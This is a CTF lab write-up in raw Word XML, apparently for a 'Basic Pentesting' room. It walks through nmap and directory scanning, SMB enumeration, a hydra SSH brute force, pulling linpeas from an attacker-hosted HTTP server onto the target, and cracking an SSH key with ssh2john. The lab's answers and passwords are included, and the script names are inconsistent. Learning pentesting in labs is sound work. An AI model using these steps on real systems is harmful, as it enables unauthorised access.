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5C34" w14:textId="1B8B042F" w:rsidR="00D7623F" w:rsidRPr="0036576C" w:rsidRDefault="0036576C" w:rsidP="00D17CA3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code SemiBold" w:hAnsi="Cascadia Code SemiBold" w:cs="Cascadia Code SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0036576C">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code SemiBold" w:hAnsi="Cascadia Code SemiBold" w:cs="Cascadia Code SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Pentesting </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698CF8C" w14:textId="77777777" w:rsidR="0036576C" w:rsidRDefault="0036576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A3E7C01" w14:textId="061ECC85" w:rsidR="00D17CA3" w:rsidRPr="0036576C" w:rsidRDefault="0036576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6576C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1 – Web App Testing and Privilege Escalation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FFCDEC" w14:textId="418B85DD" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D45E1F0" w14:textId="337EB5CE" w:rsidR="006C641A" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C641A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C641A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In these set of tasks you'll learn the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF99092" w14:textId="7E155331" w:rsidR="006C641A" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C641A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C641A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">brute forcing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C2FD1" w14:textId="2D24BC94" w:rsidR="006C641A" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C641A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C641A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hash cracking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63334BA7" w14:textId="6C553674" w:rsidR="006C641A" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C641A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C641A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>service enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B52CB" w14:textId="0CA26701" w:rsidR="00D17CA3" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C641A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C641A">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiBold" w:hAnsi="Cascadia Mono SemiBold" w:cs="Cascadia Mono SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5518F2E5" w14:textId="392B1363" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44937F6D" w14:textId="518D5704" w:rsidR="00D17CA3" w:rsidRPr="006C641A" w:rsidRDefault="006C64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 the question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECFCBB" w14:textId="4CBFDBDC" w:rsidR="00D17CA3" w:rsidRPr="006C641A" w:rsidRDefault="006C641A" w:rsidP="006C6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1.Deploye the machine and connect to the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38D3BF" w14:textId="4E204EE8" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487FF252" w14:textId="17E524EF" w:rsidR="00D17CA3" w:rsidRDefault="006C6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Find the service </w:t>
      </w:r>
      <w:r w:rsidR="001F0DE1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">exposed by machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D2ED7" w14:textId="1B2291E1" w:rsidR="00D17CA3" w:rsidRDefault="00A83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$ nmap -sC -sV </w:t>
      </w:r>
      <w:r w:rsidR="007034CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.10.208.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2851C406" w14:textId="01A2E248" w:rsidR="00D17CA3" w:rsidRDefault="00703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What is the name of the </w:t>
      </w:r>
      <w:r w:rsidR="00F74263">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hidden directory on the web server?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38205BC5" w14:textId="44E75A9D" w:rsidR="00D17CA3" w:rsidRDefault="00F742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 try dir</w:t>
      </w:r>
      <w:r w:rsidR="00582E95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">buster </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF52BAE" w14:textId="47D4A54F" w:rsidR="00D17CA3" w:rsidRDefault="00582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dirbuster dir -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00FE4544">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.10.208.103</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/</w:t>
      </w:r>
      <w:r w:rsidR="007904CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wordlists/dirbuster/medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F2D54" w14:textId="17B6F0C5" w:rsidR="00D17CA3" w:rsidRDefault="0079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- /</w:t>
      </w:r>
      <w:r w:rsidR="00F25909">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">development </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527ECB94" w14:textId="603F82BE" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F87904E" w14:textId="129538A4" w:rsidR="00F25909" w:rsidRDefault="00F25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User brute force to find the username &amp; password </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F400664" w14:textId="4C6EA6B2" w:rsidR="00D17CA3" w:rsidRDefault="00F25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– enum</w:t>
      </w:r>
      <w:r w:rsidR="00B86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Linux tool </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521213D" w14:textId="7959C96B" w:rsidR="00D17CA3" w:rsidRDefault="00B86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$ enum4linux -A 10.10.208.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF8F960" w14:textId="0490F9FF" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D3634F" w14:textId="6660D5E1" w:rsidR="00B86A4C" w:rsidRDefault="00B86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What is the username?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546E4BDF" w14:textId="7744D4C8" w:rsidR="00D17CA3" w:rsidRPr="00FB0383" w:rsidRDefault="00FB0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Hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0383">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>what about using SMB to find a username?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07007458" w14:textId="29471BCA" w:rsidR="00D17CA3" w:rsidRDefault="00FB0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- ja</w:t>
      </w:r>
      <w:r w:rsidR="00DC79FE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31095E" w14:textId="36411B10" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC9630A" w14:textId="550A6A2E" w:rsidR="00823CB2" w:rsidRDefault="00DC7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What is the password</w:t>
      </w:r>
      <w:r w:rsidR="00534D00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3B8675" w14:textId="7D599BB5" w:rsidR="00D17CA3" w:rsidRPr="00823CB2" w:rsidRDefault="00823CB2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823CB2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00823CB2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.208.103 </w:t>
      </w:r>
      <w:r w:rsidR="00534D00">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   Flag - armando</w:t>
      </w:r>
      <w:r w:rsidRPr="00823CB2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA9E27E" w14:textId="4897B0A4" w:rsidR="00D17CA3" w:rsidRDefault="009B6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What service do you use to access the server</w:t>
      </w:r>
      <w:r w:rsidR="00945B77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E607085" w14:textId="72C33DF6" w:rsidR="00945B77" w:rsidRDefault="00945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ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205B592" w14:textId="4D290A8B" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A866803" w14:textId="2593C03F" w:rsidR="004F55DA" w:rsidRDefault="004F5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Enumerate the machine to find any vector for priv</w:t>
      </w:r>
      <w:r w:rsidR="00BB2F59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF1628" w14:textId="3042E809" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CC6F20" w14:textId="28D189C5" w:rsidR="00BB2F59" w:rsidRDefault="00155FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099F0936" wp14:editId="1DD57CA9">
            <wp:extent cx="5731510" cy="5428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605B" w14:textId="073279AD" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367283A4" w14:textId="35A90D5E" w:rsidR="00D17CA3" w:rsidRDefault="00301012">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00301012">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp /opt/linePEAS/linepeas.sh  &lt;username&gt;@&lt;machine_ip&gt;:/dev/shm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0D73D9" w14:textId="58220E5E" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8E1161" w14:textId="3E3D78ED" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5754E8E6" w14:textId="6F77A05C" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4FDD56" w14:textId="21EB0615" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E49EA0" w14:textId="1058BB48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lastRenderedPageBreak/>
        <w:t>Now we are getting the LinEnum to see if we can find an vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52443353" w14:textId="09D9BDB0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In you kali machine create a directory share and nagivate into this directory. Type in the following to download the script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71E05B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wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8B76F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</w:p>
    <w:p w14:paraId="2222FA21" w14:textId="175D7E5B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Now create a http server by typing in the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E296B6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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC8BF9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</w:p>
    <w:p w14:paraId="2C522D7B" w14:textId="6BC7FCD3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Back to the ssh connection we had with jan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A788B8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type in wget http://&lt;machine_IP&gt;/LinPeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134EE29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</w:p>
    <w:p w14:paraId="786A6019" w14:textId="711B113A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Now make it executable with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F59FF6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chmod +x LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21066408" w14:textId="77777777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</w:p>
    <w:p w14:paraId="414431DA" w14:textId="35251210" w:rsidR="00B552C8" w:rsidRPr="00B552C8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Now run the script by typing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5055254D" w14:textId="70394A9D" w:rsidR="00D17CA3" w:rsidRDefault="00B552C8" w:rsidP="00B552C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B552C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD3C203" w14:textId="25C6B8D8" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53AE0272" w14:textId="62D8211B" w:rsidR="00D17CA3" w:rsidRDefault="000F37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What is the name of the other user found?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10982822" w14:textId="55D3F4DF" w:rsidR="00D17CA3" w:rsidRDefault="000F37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kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923C4EE" w14:textId="4DE4F0B0" w:rsidR="00D17CA3" w:rsidRDefault="00C76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If you have found another user, what can you do with this information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401EF363" w14:textId="19F0476A" w:rsidR="00D17CA3" w:rsidRDefault="00205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the kay private key and </w:t>
      </w:r>
      <w:r w:rsidR="00CB5B0A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>crack with ssh2john and login with kay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A9D83" w14:textId="7F996F72" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5565D8" w14:textId="4AB94071" w:rsidR="00D17CA3" w:rsidRDefault="00D67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What is the final password you obtain?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DAC8B6" w14:textId="70B13571" w:rsidR="00D17CA3" w:rsidRDefault="00D67ED3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D67ED3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heresareallystrongpasswordthatfollowsthepasswordpolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033FC986" w14:textId="4122BA59" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C53C9AA" w14:textId="656C6DBA" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBA52DD" w14:textId="0609970B" w:rsidR="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F441A9" w14:textId="77777777" w:rsidR="00D17CA3" w:rsidRPr="00D17CA3" w:rsidRDefault="00D17CA3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D17CA3" w:rsidRPr="00D1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7D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F934E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D2106"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F69ED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35"/>
    <w:rsid w:val="000F37FD"/>
    <w:rsid w:val="00131501"/>
    <w:rsid w:val="00155FAD"/>
    <w:rsid w:val="001F0DE1"/>
    <w:rsid w:val="00205F56"/>
    <w:rsid w:val="002A3B35"/>
    <w:rsid w:val="00301012"/>
    <w:rsid w:val="0036576C"/>
    <w:rsid w:val="00367890"/>
    <w:rsid w:val="003C64F6"/>
    <w:rsid w:val="00486821"/>
    <w:rsid w:val="004F55DA"/>
    <w:rsid w:val="00534D00"/>
    <w:rsid w:val="00582E95"/>
    <w:rsid w:val="006C641A"/>
    <w:rsid w:val="007034CC"/>
    <w:rsid w:val="007904CB"/>
    <w:rsid w:val="00823CB2"/>
    <w:rsid w:val="00945B77"/>
    <w:rsid w:val="009B68C0"/>
    <w:rsid w:val="00A83BF8"/>
    <w:rsid w:val="00B552C8"/>
    <w:rsid w:val="00B86A4C"/>
    <w:rsid w:val="00BB2F59"/>
    <w:rsid w:val="00C7692C"/>
    <w:rsid w:val="00CB5B0A"/>
    <w:rsid w:val="00D17CA3"/>
    <w:rsid w:val="00D67ED3"/>
    <w:rsid w:val="00D7623F"/>
    <w:rsid w:val="00DC79FE"/>
    <w:rsid w:val="00F25909"/>
    <w:rsid w:val="00F74263"/>
    <w:rsid w:val="00FB0383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9A50"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{954B7453-F76B-49CC-8EA3-4A60B37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0.208.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33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-09T17:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-09T20:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>